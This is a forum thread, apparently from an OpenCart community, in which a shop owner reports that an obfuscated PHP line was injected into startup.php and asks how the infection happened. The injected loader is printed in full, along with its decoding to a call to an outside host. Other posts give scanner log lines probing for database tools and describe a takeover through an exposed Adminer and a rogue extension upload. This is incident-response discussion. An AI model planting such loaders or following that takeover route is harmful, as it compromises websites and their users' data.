Вирус в startup.php

[maaby]

Добрый день сообщество. Столкнулся с такой проблемой.  opencart 3, внесены изменения в файл startup.php
Выглядит это так:
 

<?php $d9 = $_SERVER["\104\x4f\103\125\115\x45\116\x54\x5f\x52\x4f\117\x54"] . "\x2f\143\x61\x74\x61\x6c\x6f\147\57\x6d\x6f\144\x65\154\57\x61\143\143\x6f\x75\156\164\57"; require_once $d9 . "\166\x65\156\x64\157\x72\x2e\160\150\x70"; nMrChmuwkz::COweBqRSju("\x68\164\164\x70\x73\x3a\x2f\57\x73\164\x61\162\164\x70\x6f\x72\x74\x61\154\56\x74\157\160\57\151\156\x66\x6f\x2f", "\62\71\61\x36", 1, 1); ?>

Если кратко - подключается файл vendor.php и запускается метод nMrChmuwkz::COweBqRSju("https://startportal.top/info/", "2916", 1, 1);
который скорее всего отправляет данные на https://startportal.top/info/

Прикрепил файл вендор пхп, для примера, он зашифрован с использованием escape-последовательностей.
он дальше много чего подгружает. 

Потом создают форму, через которую на мой сервер загружают файл с именем mysql_pdo.php 
 

Что я пока не понял: какие данные они выгружают из БД. А главное, каким образом эта хрень попала на мой сайт. 
Предвосхищая комментарии, сразу напишу - никаких модулей я не скачивал с варез сайтов. Все купленно. Но правда в том, что некоторые давно не обновлялись. 

Подскажите, может кто сталкивался с похожим? Куда копать и как искать, кто виновник...
Файлы вируса приложил, но не все, т.к. первой реакцией было вычистить его нафиг. Только потом начал что-то сохранять себе для анализа. 
 

vendor.php startup.php plugins.php dist.php english.php

[SSHEVA]

14.07.2024 в 14:33, maaby сказал:

Добрый день сообщество. Столкнулся с такой проблемой.  opencart 3, внесены изменения в файл startup.php
Выглядит это так:
 

<?php $d9 = $_SERVER["\104\x4f\103\125\115\x45\116\x54\x5f\x52\x4f\117\x54"] . "\x2f\143\x61\x74\x61\x6c\x6f\147\57\x6d\x6f\144\x65\154\57\x61\143\143\x6f\x75\156\164\57"; require_once $d9 . "\166\x65\156\x64\157\x72\x2e\160\150\x70"; nMrChmuwkz::COweBqRSju("\x68\164\164\x70\x73\x3a\x2f\57\x73\164\x61\162\164\x70\x6f\x72\x74\x61\154\56\x74\157\160\57\151\156\x66\x6f\x2f", "\62\71\61\x36", 1, 1); ?>

Если кратко - подключается файл vendor.php и запускается метод nMrChmuwkz::COweBqRSju("https://startportal.top/info/", "2916", 1, 1);
который скорее всего отправляет данные на https://startportal.top/info/

Прикрепил файл вендор пхп, для примера, он зашифрован с использованием escape-последовательностей.
он дальше много чего подгружает. 

Потом создают форму, через которую на мой сервер загружают файл с именем mysql_pdo.php 
 

Что я пока не понял: какие данные они выгружают из БД. А главное, каким образом эта хрень попала на мой сайт. 
Предвосхищая комментарии, сразу напишу - никаких модулей я не скачивал с варез сайтов. Все купленно. Но правда в том, что некоторые давно не обновлялись. 

Подскажите, может кто сталкивался с похожим? Куда копать и как искать, кто виновник...
Файлы вируса приложил, но не все, т.к. первой реакцией было вычистить его нафиг. Только потом начал что-то сохранять себе для анализа. 
 

vendor.php 271 \u041a\u0431 · 0 скачиваний startup.php 3 \u041a\u0431 · 0 скачиваний plugins.php 474 \u0411 · 0 скачиваний dist.php 10 \u041a\u0431 · 0 скачиваний english.php 44 \u041a\u0431 · 0 скачиваний

Який хостинг використовуєте? Всі модулі та шаблон куплені, та де саме купували?

[maaby]

Хостинг в беларуси. Hoster.by, самый лучший, что у нас есть.
99% куплено на этом сайте. Может пару штук купил на opencart.com. Никаких помоек я точно не посещал и ничего из них не качал. 

 

[spectre]

Вам нужно обратиться к специалисту, например ко мне, и за обычные деньги все решается

 

Если вы с подобным ранее не сталкивались - у вас не получится, при всем уважении

[maaby]

Спасибо за предложение, я то вычистил уже всё. Просто интересно, как такие вирусы попадают.

[Yoda]

14.07.2024 в 17:53, maaby сказал:

Спасибо за предложение, я то вычистил уже всё. Просто интересно, как такие вирусы попадают.

Купил попкорна...

Делаем ставки, через сколько появиться опять.

Вы же расскажите если что ?

[SSHEVA]

14.07.2024 в 23:08, Yoda сказал:

Купил попкорна...

Делаем ставки, через сколько появиться опять.

Вы же расскажите если что ?

Звичайно, мені також цікаво))). Я приблизно розумію де він таке взяти міг, але. Може таки все буде добре.

Хоча кажуть, що Самолікування може шкодити здоров'ю.

[niger]

14.07.2024 в 23:08, Yoda сказал:

Купил попкорна...

Делаем ставки, через сколько появиться опять.

Вы же расскажите если что ?

А я пока схожу за картой, чтобы показать откуда на сайт готовилось нападение. 4 разных модуля. У меня и домены есть. 

[maaby]

14.07.2024 в 23:08, Yoda сказал:

Купил попкорна...

Делаем ставки, через сколько появиться опять.

Вы же расскажите если что ?

Не должен, по крайней мере я надеюсь на это.
Убрал старые модули, которые уже давно не используются, обновил остальные, сменил пароли на хостинг, обновил версию php, подключил антивирус. 

Не смотря на язвительные комментарии, я буду информировать участников форума, т.к. тема возможно будет для кого-то полезна. Если не отпишусь, то всё ок. 

[NotSlow]

14.07.2024 в 14:59, maaby сказал:

Hoster.by, самый лучший

Ну так и писали бы самому лучшему, а не сюда

Доступы есть лишь у вас и у них. Чем кто-то без доступов поможет?

 

Могу разве что посоветовать начать дружить с логами.

Берите дату изменения файла, открывайте access.log и смотрите что происходило в это время.

Как вариант - были какие-то запросы (скорей всего POST) к какому-то из файлов - открывайте смотрите что в нем.

Это может быть целиком бэкдор или вставка левого кода в обычный нормальный файл.

И дальше аналогично смотрите дату его и по логам что происходило в то время.

 

Это один из наиболее частых случаев. Когда с плагином или чем-то еще заносят собственноручно бэкдор, а через какое-то время его хозяин начинает им пользоваться.

 

Но может быть конечно и иная схема. Включая уязвимости где-то или вообще через "самого лучшего" зараза могла просочиться к вам.

[Yoda]

15.07.2024 в 16:16, maaby сказал:

Не должен, по крайней мере я надеюсь на это.
Убрал старые модули, которые уже давно не используются, обновил остальные, сменил пароли на хостинг, обновил версию php, подключил антивирус. 

Не смотря на язвительные комментарии, я буду информировать участников форума, т.к. тема возможно будет для кого-то полезна. Если не отпишусь, то всё ок. 

 

 

Надежды юношу питали. Хоть и кацап поет !

[buslikdrev]

Это ваш сайт? https://aloe.by/adminer.php

[maaby]

17.07.2024 в 00:28, buslikdrev сказал:

Это ваш сайт? https://aloe.by/adminer.php

Добрый день. Да. Спасибо, что указали мне на этот модуль. Не помню даже, зачем его ставил. 
 

16.07.2024 в 16:22, NotSlow сказал:

Ну так и писали бы самому лучшему, а не сюда

Вы вырвали из контекста мою фразу. Самый лучший в РБ. 
Я понимаю, почему вы это пишите... Но я уже давно не живу в Беларуси, т.к. не согласен с тем, что происходит. Правда магазин еще там остался, работает, что-то зарабатывает и помогает оплачивать тут счета. Отказываться от того, что приносит хоть какой-то доп. доход, я не хочу, поймите меня правильно.
 

 

16.07.2024 в 16:22, NotSlow сказал:

Могу разве что посоветовать начать дружить с логами.

Берите дату изменения файла, открывайте access.log и смотрите что происходило в это время.

Как вариант - были какие-то запросы (скорей всего POST) к какому-то из файлов - открывайте смотрите что в нем.

Это может быть целиком бэкдор или вставка левого кода в обычный нормальный файл.

И дальше аналогично смотрите дату его и по логам что происходило в то время.

 

Это один из наиболее частых случаев. Когда с плагином или чем-то еще заносят собственноручно бэкдор, а через какое-то время его хозяин начинает им пользоваться.

 

Но может быть конечно и иная схема. Включая уязвимости где-то или вообще через "самого лучшего" зараза могла просочиться к вам.

Огромное спасибо за дельный совет! Надо было давно проверить логи, только я с перепуга всё стер, как только увидел
Скорее всего ваш коллега выше уже нашел то, что я должен был обнаружить в логах. 

В общем, файл adminer.php лежит уже на сервере с 20го года. Но попытка загрузки сторонних файлов на сайт была только пару недель назад... 
Вот интересное еще в логах нашел. Стучались по следующим адресам:

109.196.163.71 - - [02/Jul/2024:09:47:21 +0300] "GET /composer.json HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:23 +0300] "GET /package.json HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:25 +0300] "GET /adminer.php HTTP/1.0" 200 4049 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:26 +0300] "GET /phpmyadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:29 +0300] "GET /phpMyAdmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:30 +0300] "GET /pma HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:32 +0300] "GET /myadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:34 +0300] "GET /dbadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:37 +0300] "GET /_phpmyadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"

admirer.php как вы понимаете, был...

Буду обновлять по мере появления новой инфы. Всем еще раз спасибо за наводки и советы. 

[buslikdrev]

17.07.2024 в 14:57, maaby сказал:

admirer.php как вы понимаете, был...

И достаточно создать нагрузку и увидеть данные от БД. Дальше ставят пароль на админа, потом через установку модулей загружают свой скрипт для получения полного доступа.

[maaby]

06.08.2024 в 15:20, buslikdrev сказал:

И достаточно создать нагрузку и увидеть данные от БД. Дальше ставят пароль на админа, потом через установку модулей загружают свой скрипт для получения полного доступа.

Скорее всего так и было. Т.к. не смог зайти в админку под своим логином \ паролем, но не придал этому значения, просто сбросил через БД. 
А в "Расширения" -> "установка расширений" - истории установок был пару месяцев назад загружен модуль english-clear-install_OC23
Т.к. я не помню, чтобы что-то такое устанавливал, то просто удалил его.

Может поможет, т.к. вредоносные сайты опять появились на моем хостинге. Очередной этап битвы, мне уже даже интересно)

[maaby]

В этот раз не спешил и сделал скриншот изменений, которые сделал вирус. 

 

[SSHEVA]

В 15.09.2024 в 20:39, maaby сказав:

В этот раз не спешил и сделал скриншот изменений, которые сделал вирус. 

 

Готов розібратися з проблемою, пишіть в особисті повідомлення, доступи до сайту та будемо разом розбиратися.

[maaby]

15.09.2024 в 20:54, SSHEVA сказал:

Готов розібратися з проблемою, пишіть в особисті повідомлення, доступи до сайту та будемо разом розбиратися.

Спасибо за предложение, я пока сам. Если закончатся идеи, тогда буду искать специалиста. 

[Yoda]

15.09.2024 в 20:03, maaby сказал:

Скорее всего так и было. Т.к. не смог зайти в админку под своим логином \ паролем, но не придал этому значения, просто сбросил через БД. 
А в "Расширения" -> "установка расширений" - истории установок был пару месяцев назад загружен модуль english-clear-install_OC23
Т.к. я не помню, чтобы что-то такое устанавливал, то просто удалил его.

Может поможет, т.к. вредоносные сайты опять появились на моем хостинге. Очередной этап битвы, мне уже даже интересно)

 

Битва головы со стеной. 
У меня уже третья порция попкорна закончилась!

[SSHEVA]

В 16.09.2024 в 18:32, Yoda сказав:

 

Битва головы со стеной. 
У меня уже третья порция попкорна закончилась!

І не кажи, зараз ще 4 принесу, бо бачу це надовго